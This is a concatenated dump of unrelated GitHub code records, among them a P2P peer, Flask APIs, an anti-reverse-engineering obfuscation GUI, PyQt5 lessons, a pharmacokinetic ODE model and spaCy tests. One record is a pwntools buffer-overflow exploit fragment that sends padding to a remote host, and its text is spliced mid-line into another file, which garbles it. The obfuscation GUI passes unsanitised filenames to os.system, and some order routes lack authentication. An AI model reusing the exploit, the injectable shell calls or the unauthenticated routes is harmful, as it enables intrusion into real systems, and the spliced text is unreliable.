elif msg_len == 1: self.search(msg[0])\n else: print(\"Somente 1 arquivo por vez.\")\n\n elif command == \"DOWNLOAD\":\n msg_len = len(msg)\n if msg_len == 0: print(\"Faltou o nome do arquivo.\")\n elif msg_len == 1: self.download(msg[0])\n else: print(\"Somente 1 arquivo por vez.\")\n\n elif command == \"LEAVE\":\n self.leave()\n else:\n print(\"Comando Invalido.\")\n\n def join(self):\n msg = Message(content=self.files, msg_type=\"JOIN\", sender=self.PEER)\n self.UDPClientSocket.sendto(msg.to_json(\"utf-8\"), self.SERVER)\n\n def search(self, requested_file):\n msg = Message(content=requested_file, msg_type=\"SEARCH\", sender=self.PEER)\n self.UDPClientSocket.sendto(msg.to_json(\"utf-8\"), self.SERVER)\n\n def download(self, requested_file):\n\n new_file_path = os.path.join(self.file_folder_path, requested_file)\n\n # if os.path.exists(new_file_path):\n # print(\"Você ja possui esse arquivo.\")\n # return None\n\n for peer in self.network_peers:\n if requested_file in self.network_peers[peer]:\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect(peer)\n msg = Message(content=requested_file, msg_type=\"DOWNLOAD\", sender=self.PEER)\n print(f\"Pedindo arquivo para o Peer [{peer[0]}]:[{peer[1]}]\")\n s.send(msg.to_json(\"utf-8\"))\n\n # Recebe via TCP do outro peer se o download foi aceito e tamanho do arquivo solicitado\n info_downlaod = s.recv(self.BUFFERSIZE).decode(\"utf-8\")\n answer_download = json.loads(info_downlaod)\n filesize = int(answer_download[\"extra_info\"])\n msg_type = answer_download[\"msg_type\"]\n time.sleep(0.1)\n if msg_type == \"DOWNLOAD_ACEITO\":\n with tqdm(range(filesize), f\"Receiving {requested_file}\", unit=\"B\", unit_scale=True, unit_divisor=1024) as progress_bar:\n with open(new_file_path, \"wb\") as f:\n while True:\n bytes_read = s.recv(self.BUFFERSIZE)\n if not bytes_read:\n break\n f.write(bytes_read)\n progress_bar.update(len(bytes_read))\n\n print(f\"Arquivo {requested_file} baixado com sucesso na pasta {self.file_folder_path}\")\n\n msg = Message(content=requested_file, msg_type=\"UPDATE\", sender=self.PEER)\n self.UDPClientSocket.sendto(msg.to_json(\"utf-8\"), self.SERVER)\n\n return None\n\n elif msg_type == \"DOWNLOAD_NEGADO\":\n print(f\"Peer [{peer[0]}]:[{peer[1]}] negou o download.\")\n\n s.close()\n\n \n\n \n\n def leave(self):\n msg = Message(content=None, msg_type=\"LEAVE\", sender=self.PEER)\n self.UDPClientSocket.sendto(msg.to_json(\"utf-8\"), self.SERVER)\n os._exit(os.EX_OK)\n\n\nif __name__ == \"__main__\":\n\n # Pega porta TCP do peer e folder no quais os arquivos de vídeo estão\n _, file_folder_path, port_tcp = sys.argv\n\n # Inicializa o peer\n peer = Peer(file_folder_path, port_tcp)\n\n # Defino o peer pela sua porta TCP\n print(f\"Peer ONLINE:\\nIP:{peer.PEER_ADRESS}\\tPORT:{peer.PEER_PORT}\")\n\n # Iniciliza thread\n download_thread = threading.Thread(target=peer._handle_download) # Responsável pelas requisições TCP de DOWNLOAD\n listening_thread = threading.Thread(target=peer._receive) # Responsável por qualquer requisição UDP\n request_thread = threading.Thread(target=peer._request) # Responsável por fazer requisições\n\n # Start as thread \n download_thread.start()\n listening_thread.start()\n request_thread.start()\n","repo_name":"rocabrera/python-learning","sub_path":"advanced/sockets/project/peer.py","file_name":"peer.py","file_ext":"py","file_size_in_byte":10049,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19712014160","text":"from flask import abort, jsonify, request\nfrom app import app, db\nfrom app.models.dish import Dish\nfrom app.models.order import Order\nfrom app.models.order_status import OrderStatus\nfrom app.routes.auth import is_admin, token_required\n\n\n@app.route('/orders', methods=['GET'])\n@token_required\n@is_admin\ndef get_all_orders(current_user):\n return jsonify(Order.query.all())\n\n\n@app.route('/orders/', methods=['GET'])\ndef get_order_by_id(id):\n order = Order.query.get(id)\n if order is None:\n abort(404)\n\n return jsonify(order)\n\n\n@app.route('/orders/status/', methods=['GET'])\ndef get_order_by_status(status):\n order = Order.query.filter(Order.status == status).all()\n if order is None:\n abort(404)\n\n return jsonify(order)\n\n\n@app.route('/orders', methods=['POST'])\n@token_required\ndef create_order(current_user):\n data = request.get_json()\n new_order = Order(\n user_id=current_user.id,\n status=OrderStatus.PENDING,\n dishes=[],\n )\n\n for dish_data in data.get('dishes'):\n dish = Dish.query.get(dish_data.get('id'))\n if dish is None:\n abort(404)\n new_order.dishes.append(dish)\n\n db.session.add(new_order)\n db.session.commit()\n return jsonify(new_order), 201\n\n\n@app.route('/orders//status/', methods=['PUT'])\n@token_required\ndef update_order_status(current_user, id, status):\n order = Order.query.get(id)\n if order is None:\n abort(404)\n\n if (current_user.id != order.user_id):\n # user can only update their own orders\n abort(401)\n\n if not OrderStatus.has_value(status):\n # invalid status\n abort(400)\n\n order.status = status\n db.session.commit()\n return jsonify(order)\n","repo_name":"bastienapp/flask-api-example","sub_path":"app/routes/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71570726508","text":"#!/usr/bin/python3\nimport tkinter as tk\nfrom tkinter import filedialog as fd\nfrom tkinter import messagebox as mb\nimport json\nimport os\n\nclass Window:\n\tdef __init__(self,root):\t#initializes Window class by placing the widgets and creating the StringVars\n\t\tself.root = root\n\t\ttk.Label(self.root, text=\"Input File\").grid(row=0,column=0)\n\t\ttk.Button(self.root, text=\"Click to Open File\", command=self.file_selection_callback).grid(row=1,column=0)\n\t\ttk.Label(self.root, text=\"Options\").grid(row=0,column=1)\n\t\t\n\t\tself.filename = \"\"\n\t\t\n\t\twith open(\"resc/descriptions.json\",\"r\") as f:\n\t\t\tself.descriptions = json.load(f)\n\t\t\n\t\tself.description_panel = tk.Text(self.root)\n\t\tself.description_panel.grid(row=0,column=2,rowspan=6)\n\n\t\tself.trace_var = tk.StringVar()\n\t\tself.breakpoint_var = tk.StringVar()\n\t\tself.time_var = tk.StringVar()\n\t\tself.nanomites_var = tk.StringVar()\n\t\tself.elf_var = tk.StringVar()\n\t\t\n\t\ttk.Checkbutton(self.root, text=\"Trace Check\", command=self.set_trace, variable=self.trace_var).grid(row=1,column=1)\n\t\ttk.Checkbutton(self.root, text=\"Breakpoint Check\", command=self.set_breakpoint, variable=self.breakpoint_var).grid(row=2,column=1)\n\t\ttk.Checkbutton(self.root, text=\"Timing Check\", command=self.set_time, variable=self.time_var).grid(row=3,column=1)\n\t\ttk.Checkbutton(self.root, text=\"Nanomites\", command=self.set_nanomites, variable=self.nanomites_var).grid(row=4,column=1)\n\t\ttk.Checkbutton(self.root, text=\"ELF format obfuscation\", command=self.set_elf_obfuscation, variable=self.elf_var).grid(row=5,column=1)\n\t\t\n\t\ttk.Button(self.root, text=\"Start obfuscating\", command=self.start_obfuscating).grid(row=2,column=0)\n\n\tdef file_selection_callback(self):\t#starts file selection dialog and saves selected filename\n\t\tname = fd.askopenfilename()\n\t\tif name != \"()\":\n\t\t\tself.description_panel.delete(\"1.0\",\"end\")\n\t\t\tself.description_panel.insert(\"1.0\",\"You opened a file: \" + name)\n\t\t\tself.filename = name\n\n\tdef change_description(self,selection):\t#change description of panel\n\t\tself.description_panel.delete(\"1.0\",\"end\")\n\t\tself.description_panel.insert(\"1.0\",self.descriptions[selection])\n\n\tdef set_trace(self):\t#set description of panel to tracing check\n\t\tif self.trace_var.get() == \"1\":\n\t\t\tself.change_description(\"trace\")\n\t\t\n\tdef set_breakpoint(self):\t#set description of panel to breakpoint check\n\t\tif self.breakpoint_var.get() == \"1\":\n\t\t\tself.change_description(\"breakpoint\")\n\t\n\tdef set_time(self):\t#set description of panel to timing check\n\t\tif self.time_var.get() == \"1\":\n\t\t\tself.change_description(\"time\")\n\t\t\t\n\tdef set_nanomites(self):\t#set description of panel to nanomites\n\t\tif self.nanomites_var.get() == \"1\":\n\t\t\tself.change_description(\"nanomites\")\n\t\n\tdef set_elf_obfuscation(self):\t#set description of panel to elf obfuscation\n\t\tif self.elf_var.get() == \"1\":\n\t\t\tself.change_description(\"elf_obfuscation\")\n\t\t\t\n\tdef start_obfuscating(self):\t#function that gets executed when the \"Start obfuscating\" button is pressed. It decides which functions to run based on the check buttons\n\t\tif self.filename == \"\":\n\t\t\tmb.showinfo(title=\"File selection\",message=\"Please select an input file\")\n\t\telse:\n\t\t\tif self.trace_var.get() == \"1\" or self.breakpoint_var.get() == \"1\" or self.time_var.get() == \"1\":\t#if a source level change has been selected\n\t\t\t\tif \".c\" not in self.filename:\n\t\t\t\t\tmb.showinfo(title=\"File selection\",message=\"Please provide C source file as input\")\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tself.antianapy()\n\t\t\t\t\tself.compile()\n\t\t\t\t\tif self.nanomites_var.get() == \"1\" or self.elf_var.get() == \"1\":\t#if a further elf level change has been selected\n\t\t\t\t\t\tself.elf_changes(\"$(pwd)/../antirevgui_output\")\n\t\t\t\t\tself.end()\n\n\t\t\telif self.nanomites_var.get() == \"1\" or self.elf_var.get() == \"1\":\t#if elf level change has been selected\n\t\t\t\twith open(self.filename,\"rb\") as f:\n\t\t\t\t\tif f.read(4) != b\"\\x7fELF\":\n\t\t\t\t\t\tmb.showinfo(title=\"File selection\",message=\"Please provide ELF file as input\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tself.elf_changes()\n\t\t\t\t\t\tself.end()\t\n\t\t\t\n\tdef antianapy(self):\t#applies source level changes by calling ANTIANAPY\n\t\tshell_string = \"cd ANTIANAPY;./ANTIANAPY.py \" + self.filename + \" --non-interactive\"\n\t\tif self.trace_var.get() == \"1\":\n\t\t\tshell_string += \" --trace\"\n\t\tif self.breakpoint_var.get() == \"1\":\n\t\t\tshell_string += \" --breakpoint\"\n\t\tif self.time_var.get() == \"1\":\n\t\t\tshell_string += \" --time\"\n\t\tos.system(shell_string)\n\n\tdef compile(self):\t#compiles output of ANTIANAPY and removes generated source file\n\t\tshell_string = \"gcc \" + self.filename[:-(len(self.filename.split(\"/\")[-1].split(\".\")[0])+2)] + self.filename.split(\"/\")[-1].split(\".\")[0] + \"_antianapy.c\" + \" -o antirevgui_output\"\n\t\tif self.time_var.get() == \"1\":\n\t\t\tshell_string += \" -pthread\"\n\t\tos.system(shell_string)\n\t\tshell_string = \"rm \" + self.filename[:-(len(self.filename.split(\"/\")[-1].split(\".\")[0])+2)] + self.filename.split(\"/\")[-1].split(\".\")[0] + \"_antianapy.c\"\n\t\tos.system(shell_string)\n\t\t\n\tdef elf_changes(self,elf_name = \"\"):\t#implements changes on ELF level by calling ELFREVGO and APAKER\n\t\tif elf_name == \"\":\n\t\t\telf_name = self.filename\n\t\tif self.nanomites_var.get() == \"1\":\n\t\t\tshell_string = \"cd APAKER;./add_nanomites.sh \" + elf_name + \" $(pwd)/../antirevgui_output\"\n\t\t\tos.system(shell_string)\n\t\t\telf_name = \"$(pwd)/../antirevgui_output\"\n\t\tif self.elf_var.get() == \"1\":\n\t\t\tshell_string = \"cd ELFREVGO;./ELFREVGO -f \" + elf_name + \" -o $(pwd)/../antirevgui_output -t -n -b -e\"\n\t\t\tos.system(shell_string)\n\t\n\tdef end(self):\t#displays name of output file\n\t\tself.description_panel.delete(\"1.0\",\"end\")\n\t\tself.description_panel.insert(\"1.0\",\"Finished compiling your source file, you can find the output file under the name\\nantirevgui_output in the current directory\")\n\t\n\nwindow = tk.Tk()\nwindow.title(\"AntiRevGUI\")\nimg = tk.Image(\"photo\", file=\"images/laptop.png\")\t#sets app icon\nwindow.tk.call(\"wm\",\"iconphoto\",window._w,img)\napp = Window(window)\nwindow.mainloop()\n\n","repo_name":"Trigleos/AntiRevGUI","sub_path":"AntiRevGUI.py","file_name":"AntiRevGUI.py","file_ext":"py","file_size_in_byte":5865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43319333105","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\n\nimport sys\n\nclass Color(QWidget):\n\n def __init__(self, color, *args, **kwargs):\n super(Color, self).__init__(*args, **kwargs)\n self.setAutoFillBackground(True)\n \n palette = self.palette()\n palette.setColor(QPalette.Window, QColor(color))\n self.setPalette(palette)\n\nclass MainWindow(QMainWindow):\n\n def __init__(self, *args, **kwargs):\n super(MainWindow, self).__init__(*args, **kwargs)\n \n self.setWindowTitle(\"My Awesome App\")\n '''\n # We need a layout to be able to add widget\n # QVBoxLayout is vertical and QH is horizontal\n layout1 = QHBoxLayout()\n layout2 = QVBoxLayout()\n layout3 = QVBoxLayout()\n\n layout2.addWidget(Color('blue'))\n layout2.addWidget(Color('white'))\n layout2.addWidget(Color('red'))\n\n layout1.addLayout(layout2)\n layout1.addWidget(Color('green'))\n\n # Setting space between layouts\n layout1.setContentsMargins(0,0,0,0)\n layout1.setSpacing(20)\n\n\n layout3.addWidget(Color('red'))\n layout3.addWidget(Color('purple'))\n\n layout1.addLayout(layout3)\n\n widget = QWidget()\n widget.setLayout(layout1)\n self.setCentralWidget(widget)\n '''\n '''\n # QGrid acts like a matrix\n layout = QGridLayout()\n\n layout.addWidget(Color('red'), 0, 0)\n layout.addWidget(Color('green'), 1, 0)\n layout.addWidget(Color('blue'), 1, 1)\n layout.addWidget(Color('purple'), 2, 1)\n\n widget = QWidget()\n widget.setLayout(layout)\n self.setCentralWidget(widget)\n '''\n # Making tabs\n tabs = QTabWidget()\n tabs.setDocumentMode(True)\n tabs.setTabPosition(QTabWidget.North)\n tabs.setMovable(True)\n\n for n, color in enumerate(['red','green','blue','yellow']):\n tabs.addTab( Color(color), color)\n\n self.setCentralWidget(tabs)\n\napp = QApplication(sys.argv)\n\nwindow = MainWindow()\nwindow.show() # IMPORTANT!!!!! Windows are hidden by default.\n\n# Start the event loop.\napp.exec_()","repo_name":"kerenskybr/pyqt5_courses","sub_path":"getting_started/lesson5.py","file_name":"lesson5.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18567212192","text":"from flask import Flask, request, jsonify\nfrom werkzeug.datastructures import FileStorage\nfrom flask_cors import CORS\n\nfrom config.settings import app_config\nfrom service import statement as statement_service\nfrom service import splitwise\nfrom util import constants, log\n\napp = Flask(__name__)\napp.config[constants.MAX_CONTENT_LENGTH] = app_config.FLASK_MAX_CONTENT_LENGTH\ncors = CORS(app, resources={r'/api/*': {'origins': '*'}})\n\n@app.route('/', methods=[constants.REQUEST_GET])\n@app.route('/health', methods=[constants.REQUEST_GET])\ndef health():\n return dict({'status': 'OK'})\n\n@app.route('/api/v1/login', methods=[constants.REQUEST_GET])\ndef login():\n domain = request.headers.get(constants.HEADER_ORIGIN)\n url = splitwise.login(domain=domain)\n return url\n\n@app.route('/api/v1/authorize', methods=[constants.REQUEST_POST])\ndef authorize():\n data = request.get_json()\n code = data[constants.CODE]\n domain = request.headers.get(constants.HEADER_ORIGIN)\n response = splitwise.authorize(code, domain)\n return dict({\n 'user': response['user'],\n 'token': response['token'],\n })\n\n@app.route('/api/v1/upload', methods=[constants.REQUEST_POST])\ndef upload():\n file = request.files['statement']\n bank = request.form['bank']\n if not file or not bank:\n return dict({'error': 'missing data'}), 400\n if not isinstance(file, FileStorage):\n raise TypeError(\n 'file obj must be type werkzeug.datastructures.FileStorage')\n if not allowed_file(file.filename):\n return dict({'error': 'unsupported file type'}), 400\n if bank not in app_config.BANK_ALLOWED_VALUES:\n raise ValueError('invalid bank value')\n try:\n pre_processor = statement_service.Preprocess(file_obj=file, bank=bank)\n expense_list = pre_processor.sanitize()\n return dict({'data': expense_list})\n except Exception as e:\n log.logger.error(e, exc_info=True)\n return constants.INTERNAL_ERROR_DICT, 500\n\n@app.route('/api/v1/groups', methods=[constants.REQUEST_GET])\ndef groups():\n try:\n access_token = request.headers.get('Authorization')\n response = splitwise.groups(access_token)\n return response\n except Exception as e:\n log.logger.error(e, exc_info=True)\n return constants.INTERNAL_ERROR_DICT, 500\n\n@app.route('/api/v1/categories', methods=[constants.REQUEST_GET])\ndef categories():\n try:\n access_token = request.headers.get('Authorization')\n response = splitwise.categories(access_token=access_token)\n return response\n except Exception as e:\n log.logger.error(e, exc_info=True)\n return constants.INTERNAL_ERROR_DICT, 500\n\n@app.route('/api/v1/expenses', methods=[constants.REQUEST_POST])\ndef expenses():\n access_token = request.headers.get('Authorization')\n raw_expenses = request.json['expenses']\n try:\n created_expenses = splitwise.create_expense(raw_expenses=raw_expenses, access_token=access_token)\n return created_expenses, 200\n except Exception as e:\n log.logger.error(e, exc_info=True)\n return constants.INTERNAL_ERROR_DICT, 500 \n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in app_config.FLASK_ALLOWED_EXTENSIONS\n\nif __name__ == \"__main__\":\n app.run('0.0.0.0', 8080)\n","repo_name":"preetham/samsaram-be","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20014286768","text":"# Last edit date : 2019.09.15\n# This is a source code to check if a word is in the dictionary.\n\nimport Get_word_dictionary as gwd\n\ndef get_word_from_file():\n global word_list\n fp = open(\"Data\\data_e6.dat\",\"rt\",encoding = \"UTF-8\")\n word_list = fp.readlines()\n for i in range(len(word_list)-1):\n word_list[i] = word_list[i][:len(word_list[i])-1]\n fp.close()\ndef main():\n get_word_from_file()\n a = 0\n selected_word = word_list[a]\n for i in range(a,len(word_list)):\n gwd.Get_Need_Content(selected_word)\n print(i)\n print(selected_word)\n print(gwd.meaning_of_word)\n print(gwd.example_of_word)\n print(\" \")\n selected_word = word_list[i+1]\n\nmain()\n","repo_name":"koi312500/lexical_learning_program","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22823814230","text":"from npc.Npc import Npc\nimport pygame\nfrom artifacts.Artifact import Artifact\nimport os\nfrom pathlib import Path\nfrom artifacts.AttackClass import AttackClass\n\ncurrent = os.path.dirname(os.path.realpath(__file__))\npath = Path(__file__).resolve().parent.parent.parent\n\n\n# Class for a npc of type Dark Wizard, inherits from Npc class inheriting from Character class\nclass Unicorn(Npc):\n def __init__(self, name, side, mana, life, images, artifacts, quests, x, y, pos, groups,\n collision_sprites):\n super().__init__(name, side, mana, life, images, artifacts, quests, pos, groups, collision_sprites)\n self.rect.x = x\n self.rect.y = y\n self.race = \"Unicorn\"\n self.collision_sprites = collision_sprites\n self.can_talk = True\n blood_image = pygame.image.load(os.path.join(path, \"resources/graphics/artifacts\", \"blood.PNG\")).convert_alpha()\n self.blood = Artifact(blood_image, 10, 'Unicorn Blood', None)\n horn_image = pygame.image.load(os.path.join(path, \"resources/graphics/artifacts\", \"horn.PNG\")).convert_alpha()\n self.horn = Artifact(horn_image, 10, 'Unicorn Horn', None)\n heart_image = pygame.image.load(os.path.join(path, \"resources/graphics/artifacts\", \"unicorn_heart.PNG\")).convert_alpha()\n self.heart = Artifact(heart_image, 10, 'Unicorn Heart', None)\n self.artifacts.add(self.blood, self.horn, self.heart)\n unicorn_attack = pygame.image.load(\n os.path.join(path, \"resources/graphics/particles\", \"spell.PNG\")).convert_alpha()\n self.npc_attack = AttackClass(unicorn_attack, 20, 10, 'unicorn attack')\n","repo_name":"Rudaq/MagicalWorld","sub_path":"game/npc/Unicorn.py","file_name":"Unicorn.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9665431813","text":"# Linked List delete of a given Node.\n# Structure of a Linked list look like:-\n # NodeA->NodeB->NodeC->NodeD->NodeE\n\n# At first we create a simple Linked List.\nclass List:\n def __init__(self,num):\n self.data=num\n self.address=None\nclass linkedList:\n def __init__(self):\n self.head=None\n def create(self,num):\n newNode=List(num)\n if self.head is None:\n self.head=newNode\n self.last=newNode\n else:\n self.last.address=newNode\n self.last=newNode\n\n# Then we count the position & delete the perticular node.\n def delete_position(self,position):\n delete_node=self.head\n position = position-1\n while (position>0):\n position=position-1\n previous=delete_node\n delete_node=delete_node.address\n previous.address=delete_node.address\n def printList(self):\n temp=self.head\n while temp is not None:\n print(temp.data)\n temp=temp.address\n\n# Call The Functions.\no=linkedList()\na=int(input(\"Number of inputs:- \"))\nfor j in range(0,a):\n o.create(int(input(\"Node.data: \")))\nposition=int(input(\"Input a random position: \"))\no.delete_position(position)\no.printList()\n \n","repo_name":"aYgCOO/DSA-In-PY","sub_path":"DSA/Linear/Dynamic/Linked_list/linked_list_delete_of_a_given_node.py","file_name":"linked_list_delete_of_a_given_node.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"41688232781","text":"#!/usr/bin/env python3\n#coding: utf-8\n\nfrom pwn import *\nfrom struct import pack\nfrom constants import *\n \n\ndef exit_custom_nb(nb):\n g = cyclic_gen()\n conn = remote(HOST,PORT)\n p = b''.join([\n b'A'*OFFSET,\n pack('= 180:\r\n t = np.linspace(0, time_limit, 100 * time_limit + 1) # шаг 0.01\r\nelse:\r\n t = np.linspace(0, 180, 100 * 180 + 1) # шаг 0.01\r\nt_0 = 100 * 0 # поскольку шаг по оси t в 100 раза меньше суток, то 30-е сутки будут 3000-ым элементом массива\r\nt_30 = 100 * 30\r\nt_60 = 100 * 60\r\nt_120 = 100 * 120\r\nt_180 = 100 * 180\r\nM0 = [0, 0, 0, 0, 0, 0, 0]\r\nK_start = [2500, 0.1268, 0.5875, 0.8209, 0.0147, 0.1481, 0.1707]\r\n\r\n\r\nresult = spo.minimize(deviation, K_start, options={'disp': True})\r\nif result.success:\r\n print('Success!')\r\nelse:\r\n print('Sorry, could not find a minimum')\r\nM = odeint(model, M0, t, args=(result.x,))\r\n\r\n\r\nt_data = [0, 30, 60, 120, 180]\r\nM3_data = [0, 18.5, 20.1, 19.1, 32.2]\r\nM4_data = [0, 63.1, 84.7, 137.3, 166]\r\nM5_data = [0, 63.7, 78.1, 96.1, 89]\r\nM6_data = [0, 105, 102.1, 113, 90.7]\r\nM3err_data = [0, 5.5, 3.7, 9, 8.8]\r\nM4err_data = [0, 5.3, 19.1, 41.2, 24]\r\nM5err_data = [0, 19.8, 34.2, 38.7, 19.3]\r\nM6err_data = [0, 38.3, 40.9, 33.4, 15.1]\r\n\r\n\r\nmatplotlib.rcParams['font.family'] = 'times new roman'\r\nmatplotlib.rcParams['figure.subplot.left'] = 0.05\r\nmatplotlib.rcParams['figure.subplot.bottom'] = 0.07\r\nmatplotlib.rcParams['figure.subplot.right'] = 0.99\r\nmatplotlib.rcParams['figure.subplot.top'] = 0.99\r\nplt.rc('xtick', labelsize=15)\r\nplt.rc('ytick', labelsize=15)\r\nplt.plot(t, M[:, 3], 'r-', linewidth=2.0, label=\"кровь\")\r\nplt.plot(t, M[:, 4], 'orange', linewidth=2.0, label=\"мозг\")\r\nplt.plot(t, M[:, 5], 'y-', linewidth=2.0, label=\"легкие\")\r\nplt.plot(t, M[:, 6], 'g-', linewidth=2.0, label=\"печень\")\r\nplt.scatter(t_data, M3_data, s=25, color='r', marker='D')\r\nplt.scatter(t_data, M4_data, s=25, color='orange', marker='D')\r\nplt.scatter(t_data, M5_data, s=25, color='y', marker='D')\r\nplt.scatter(t_data, M6_data, s=25, color='g', marker='D')\r\nplt.errorbar(t_data, M3_data, M3err_data, ls='', ecolor='r', elinewidth=2.0, barsabove=True)\r\nplt.errorbar(t_data, M4_data, M4err_data, ls='', ecolor='orange', elinewidth=2.0, barsabove=True)\r\nplt.errorbar(t_data, M5_data, M5err_data, ls='', ecolor='y', elinewidth=2.0, barsabove=True)\r\nplt.errorbar(t_data, M6_data, M6err_data, ls='', ecolor='g', elinewidth=2.0, barsabove=True)\r\nplt.xlabel(\"t, сутки\", size=12)\r\nplt.ylabel(\"M, нг\", size=12)\r\nplt.legend(fontsize=12)\r\nplt.grid()\r\nstroka = 'k32 = ' + str(round(result.x[0], 4)) + '\\n' + 'k34 = ' + str(round(result.x[1], 4)) + '\\n' + 'k35 = ' + \\\r\n str(round(result.x[2], 4)) + '\\n' + 'k36 = ' + str(round(result.x[3], 4)) + '\\n' + 'k43 = ' + \\\r\n str(round(result.x[4], 4)) + '\\n' + 'k53 = ' + str(round(result.x[5], 4)) + '\\n' + 'k63 = ' + \\\r\n str(round(result.x[6], 4)) + '\\n' + 'otkl = ' + str(round(result.fun, 4)) + '\\n' + 's = ' + str(round(sum(result.x[:4]), 4))\r\n# plt.text(15, 248, stroka, bbox=dict(facecolor='white', alpha=0.7), horizontalalignment='left', verticalalignment='top', size=12)\r\nplt.show()\r\n\r\n\r\n\"\"\"\r\n# разность аналитического и численного решения\r\nM3 = [m / s - m / s * math.exp(-s * time) for time in t]\r\nM4 = [K[1] * m / s * time + K[1] * m / (s ** 2) * math.exp(-s * time) - K[1] * m / s ** 2 for time in t]\r\nM5 = [K[2] * m / s * time + K[2] * m / (s ** 2) * math.exp(-s * time) - K[2] * m / s ** 2 for time in t]\r\nM6 = [K[3] * m / s * time + K[3] * m / (s ** 2) * math.exp(-s * time) - K[3] * m / s ** 2 for time in t]\r\nrM3 = [M3[time] - M[time][3] for time in range(len(t))]\r\nrM4 = [M4[time] - M[time][4] for time in range(len(t))]\r\nrM5 = [M5[time] - M[time][5] for time in range(len(t))]\r\nrM6 = [M6[time] - M[time][6] for time in range(len(t))]\r\n\r\n\r\nplt.rc('xtick', labelsize=15)\r\nplt.rc('ytick', labelsize=15)\r\nplt.plot(t, rM3, 'r-', linewidth=1.0, label=\"кровь\")\r\nplt.plot(t, rM4, 'orange', linewidth=1.0, label=\"мозг\")\r\nplt.plot(t, rM5, 'y-', linewidth=1.0, label=\"легкие\")\r\nplt.plot(t, rM6, 'g-', linewidth=1.0, label=\"печень\")\r\nplt.xlabel(\"t, сутки\", size=18)\r\nplt.ylabel(\"M, нг\", size=18)\r\nplt.legend(fontsize=12)\r\nplt.grid()\r\nplt.show()\r\n\"\"\"\r\n\r\n\r\n# bnds = ((40, 50), (0, 1), (0, 1), (0, 1), (0, 1), (0, 1), (0, 1)) # границы для возможных значений k\r\n# cons = ({'type': 'eq', 'fun': lambda xy: (2 * xy[0] + xy[1] - 100)}) # дополнительные условия, выражение в скобках должно быть равно нулю\r\n# cons = ({'type': 'ineq', 'fun': lambda xy: (2 * xy[0] + xy[1] - 100)}) # когда нужно условие: выражение в скобках >= 0\r\n# result = spo.minimize(f, xy_start, options={'disp': True}, constraints=cons, bounds=bnds)\r\n\r\n\r\n# print(M[t_0][3], M[t_30][3], M[t_60][3], M[t_120][3], M[t_180][3])\r\n# print(M[t_0][4], M[t_30][4], M[t_60][4], M[t_120][4], M[t_180][4])\r\n# print(M[t_0][5], M[t_30][5], M[t_60][5], M[t_120][5], M[t_180][5])\r\n# print(M[t_0][6], M[t_30][6], M[t_60][6], M[t_120][6], M[t_180][6])\r\n\r\n\r\n# print('K =', result.x, 'min_deviation =', result.fun)\r\n# print(stroka)\r\n# print('s =', sum(result.x[:4]))\r\n","repo_name":"loginmarii/Mathematical-Modelling-of-the-Accumulation-Kinetics-of-Silver-Nanoparticles-in-a-Mammalian-Organism","sub_path":"Решение системы без стоков.py","file_name":"Решение системы без стоков.py","file_ext":"py","file_size_in_byte":7012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35623393906","text":"### \n# Testing\n###\nnlp1 = spacy.load(r\"C:\\Users\\jacoma\\repos\\coffee_app\\output\\model-best\") #load the best model\n\ncontent=[]\nstart=[]\nend=[]\nlabel=[]\nfor entry in validation_data:\n\n entities = entry[1]['entities']\n\n if len(entities) == 0:\n content.append(entry[0])\n start.append(-1)\n end.append(-1)\n label.append('NA')\n else:\n for entity in entities:\n content.append(entry[0])\n start.append(entity[0])\n end.append(entity[1])\n label.append(entity[2])\n\nvalidationDF = pd.DataFrame({'content':content, 'start':start, 'end':end, 'label':label})\n\nv_content=[]\nv_text = []\nv_start = []\nv_end = []\nv_label = []\nfor sent in pd.Series(content).unique():\n doc = nlp1(sent)\n\n spacy.displacy.serve(doc, style=\"ent\")\n\n for ent in doc.ents:\n v_content.append(sent)\n v_text.append(ent.text)\n v_start.append(ent.start_char)\n v_end.append(ent.end_char)\n v_label.append(ent.label_) \n\npred_valid_DF = pd.DataFrame({'content':v_content, 'text':v_text, 'start':v_start, 'end':v_end, 'label':v_label})\n\nmerged = pd.merge(validationDF, pred_valid_DF[['start', 'end', 'text', 'content', 'label']], how = \"left\", on = ['content', 'start', 'end'], suffixes=['_valid', '_pred'])\n\nmerged[merged.label_valid != merged.label_pred]\n\n#####\n#\n#####\ndef get_cleaned_label(label: str):\n if \"-\" in label:\n return label.split(\"-\")[1]\n else:\n return label\n \n \ndef create_target_vector(doc):\n return [get_cleaned_label(label[2]) for label in doc[1][\"entities\"]]\n\n\ndef create_total_target_vector(docs):\n target_vector = []\n for doc in docs:\n target_vector.extend(create_target_vector(doc))\n return target_vector\n\n#####\n# Create Prediction Vector\n#####\ndef create_prediction_vector(text):\n return [get_cleaned_label(prediction) for prediction in get_all_ner_predictions(text)]\n\n \ndef create_total_prediction_vector(docs: list):\n prediction_vector = []\n for doc in docs:\n prediction_vector.extend(create_prediction_vector(doc[0]))\n return prediction_vector\n\ndef get_all_ner_predictions(text):\n doc = nlp1(text)\n entities = [(e.start_char, e.end_char, e.label_) for 